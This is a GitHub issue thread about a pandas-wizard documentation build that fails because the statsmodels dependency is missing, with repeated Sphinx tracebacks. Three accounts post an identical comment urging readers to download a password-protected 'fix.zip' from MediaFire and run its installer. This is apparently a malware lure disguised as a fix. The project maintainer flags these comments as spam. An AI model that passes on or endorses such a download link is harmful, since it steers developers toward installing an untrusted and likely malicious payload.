### ISSUE TITLE
[Bug]: Introducing Time Series Requires Additional Module Dependencies

### ISSUE THREAD

**Issue by ZenithClown** [sharkutilities/pandas-wizard#30]
### What happened?

Issue is raised because time series uses the following additional packages:

```python
statsmodels==0.14.2
```

### Python Version

3.9 (default)

### What type of operating system are you using?

Windows 11

### Relevant log output

```shell
Running Sphinx v7.1.2

Traceback (most recent call last):
  File "/home/docs/checkouts/readthedocs.org/user_builds/pandas-wizard/envs/latest/lib/python3.10/site-packages/sphinx/config.py", line 356, in eval_config_file
    exec(code, namespace)  # NoQA: S102
  File "/home/docs/checkouts/readthedocs.org/user_builds/pandas-wizard/checkouts/latest/docs/conf.py", line 16, in <module>
    import pandaswizard as pdw
  File "/home/docs/checkouts/readthedocs.org/user_builds/pandas-wizard/checkouts/latest/pandaswizard/__init__.py", line 31, in <module>
    from pandaswizard import timeseries
  File "/home/docs/checkouts/readthedocs.org/user_builds/pandas-wizard/checkouts/latest/pandaswizard/timeseries/__init__.py", line 28, in <module>
    from pandaswizard.timeseries.stationarity import *
  File "/home/docs/checkouts/readthedocs.org/user_builds/pandas-wizard/checkouts/latest/pandaswizard/timeseries/stationarity.py", line 11, in <module>
    from statsmodels.tsa.stattools import kpss # kpss test
ModuleNotFoundError: No module named 'statsmodels'

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/home/docs/checkouts/readthedocs.org/user_builds/pandas-wizard/envs/latest/lib/python3.10/site-packages/sphinx/cmd/build.py", line 285, in build_main
    app = Sphinx(args.sourcedir, args.confdir, args.outputdir,
  File "/home/docs/checkouts/readthedocs.org/user_builds/pandas-wizard/envs/latest/lib/python3.10/site-packages/sphinx/application.py", line 207, in __init__
    self.config = Config.read(self.confdir, confoverrides or {}, self.tags)
  File "/home/docs/checkouts/readthedocs.org/user_builds/pandas-wizard/envs/latest/lib/python3.10/site-packages/sphinx/config.py", line 179, in read
    namespace = eval_config_file(filename, tags)
  File "/home/docs/checkouts/readthedocs.org/user_builds/pandas-wizard/envs/latest/lib/python3.10/site-packages/sphinx/config.py", line 369, in eval_config_file
    raise ConfigError(msg % traceback.format_exc()) from exc
sphinx.errors.ConfigError: There is a programmable error in your configuration file:

Traceback (most recent call last):
  File "/home/docs/checkouts/readthedocs.org/user_builds/pandas-wizard/envs/latest/lib/python3.10/site-packages/sphinx/config.py", line 356, in eval_config_file
    exec(code, namespace)  # NoQA: S102
  File "/home/docs/checkouts/readthedocs.org/user_builds/pandas-wizard/checkouts/latest/docs/conf.py", line 16, in <module>
    import pandaswizard as pdw
  File "/home/docs/checkouts/readthedocs.org/user_builds/pandas-wizard/checkouts/latest/pandaswizard/__init__.py", line 31, in <module>
    from pandaswizard import timeseries
  File "/home/docs/checkouts/readthedocs.org/user_builds/pandas-wizard/checkouts/latest/pandaswizard/timeseries/__init__.py", line 28, in <module>
    from pandaswizard.timeseries.stationarity import *
  File "/home/docs/checkouts/readthedocs.org/user_builds/pandas-wizard/checkouts/latest/pandaswizard/timeseries/stationarity.py", line 11, in <module>
    from statsmodels.tsa.stattools import kpss # kpss test
ModuleNotFoundError: No module named 'statsmodels'


Configuration error:
There is a programmable error in your configuration file:

Traceback (most recent call last):
  File "/home/docs/checkouts/readthedocs.org/user_builds/pandas-wizard/envs/latest/lib/python3.10/site-packages/sphinx/config.py", line 356, in eval_config_file
    exec(code, namespace)  # NoQA: S102
  File "/home/docs/checkouts/readthedocs.org/user_builds/pandas-wizard/checkouts/latest/docs/conf.py", line 16, in <module>
    import pandaswizard as pdw
  File "/home/docs/checkouts/readthedocs.org/user_builds/pandas-wizard/checkouts/latest/pandaswizard/__init__.py", line 31, in <module>
    from pandaswizard import timeseries
  File "/home/docs/checkouts/readthedocs.org/user_builds/pandas-wizard/checkouts/latest/pandaswizard/timeseries/__init__.py", line 28, in <module>
    from pandaswizard.timeseries.stationarity import *
  File "/home/docs/checkouts/readthedocs.org/user_builds/pandas-wizard/checkouts/latest/pandaswizard/timeseries/stationarity.py", line 11, in <module>
    from statsmodels.tsa.stattools import kpss # kpss test
ModuleNotFoundError: No module named 'statsmodels'
Command time: 1s Return: 2
```

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZenithClown** [comment]
@qlqw233 @llowvxe @pilot5657 please follow contributors' guideline, and do not spam repository or will be blocked w/o further warning.
